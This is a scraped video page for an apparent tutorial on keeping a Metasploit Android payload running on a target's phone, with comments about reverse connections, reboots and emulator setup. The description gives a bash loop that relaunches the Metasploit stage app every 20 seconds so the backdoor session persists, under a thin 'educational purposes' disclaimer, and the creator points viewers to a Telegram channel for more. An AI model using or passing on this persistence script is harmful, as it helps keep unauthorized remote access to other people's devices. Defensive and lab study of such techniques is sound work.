Creating a Persistent Android Payload with Metasploit: Tutorial

แชร์
ฝัง
  • เผยแพร่เมื่อ 9 พ.ค. 2024
  • Copy and Paste this code into a txt file and Save it as anyfilename.sh
    Code:
    #!/bin/bash
    while :
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
    done
    This video is for educational purposes only. Any actions taken based on the information provided are solely the responsibility of the viewer. The creator does not encourage or condone any illegal activities.
  • แนวปฏิบัติและการใช้ชีวิต

ความคิดเห็น • 14

  • @kunjpadhan1377
    @kunjpadhan1377 12 วันที่ผ่านมา +1

    Is it working....???
    Because it happens like this in some videos either the payload does not get installed or if it gets installed then the reverse technique does not work..

  • @ggelosstavrou9117
    @ggelosstavrou9117 13 วันที่ผ่านมา +1

    What if the target reboots the machine ?

  • @user-zt3bd4th5m
    @user-zt3bd4th5m 7 วันที่ผ่านมา

    Hello my postgresql is no connections ?

  • @epiphanyivan8052
    @epiphanyivan8052 13 วันที่ผ่านมา +1

    The script is working it says syntax error

    • @CodeHavox
      @CodeHavox  13 วันที่ผ่านมา

      Please contact me on telegram for any further help: t.me/codehavoxofficial also feel free to join my channel.

  • @ggelosstavrou9117
    @ggelosstavrou9117 13 วันที่ผ่านมา +1

    Also which android emulator you use?

    • @CodeHavox
      @CodeHavox  13 วันที่ผ่านมา

      yes if the target reboots the device then you will loose the connection, due to youtube's policy I have covered a different video on my telegram for that: t.me/codehavoxofficial feel free to visit thanks for your question.

  • @CodeHavox
    @CodeHavox  12 วันที่ผ่านมา

    Also please feel free to join my Telegram Channel, to get even more Advance contents related to Ethical Hacking: t.me/codehavoxofficial

  • @ggelosstavrou9117
    @ggelosstavrou9117 10 วันที่ผ่านมา +1

    Which android emulator you use?

    • @CodeHavox
      @CodeHavox  10 วันที่ผ่านมา

      I'm using LD9 Emulator in the following video, but I don't use it anymore since it turns out not to be safe anymore, I recommend you use android studio if possible.

    • @ggelosstavrou9117
      @ggelosstavrou9117 10 วันที่ผ่านมา

      @@CodeHavox but how do you make any android virtual machine visible to your Kali virtual machine ?? I mean how do you make them connect to the same network ?

    • @CodeHavox
      @CodeHavox  10 วันที่ผ่านมา

      @@ggelosstavrou9117 set your virtual machine's network to bridge mode, also you can try turning off the firewall of you vritual machine if you're not able to connect to the local devices.

    • @ggelosstavrou9117
      @ggelosstavrou9117 9 วันที่ผ่านมา

      @@CodeHavox it does not give such option . Please make a tutorial on it . I use android studio as I told you before

    • @CodeHavox
      @CodeHavox  9 วันที่ผ่านมา

      @@ggelosstavrou9117 thanks for letting me know will be covering a video about it soon.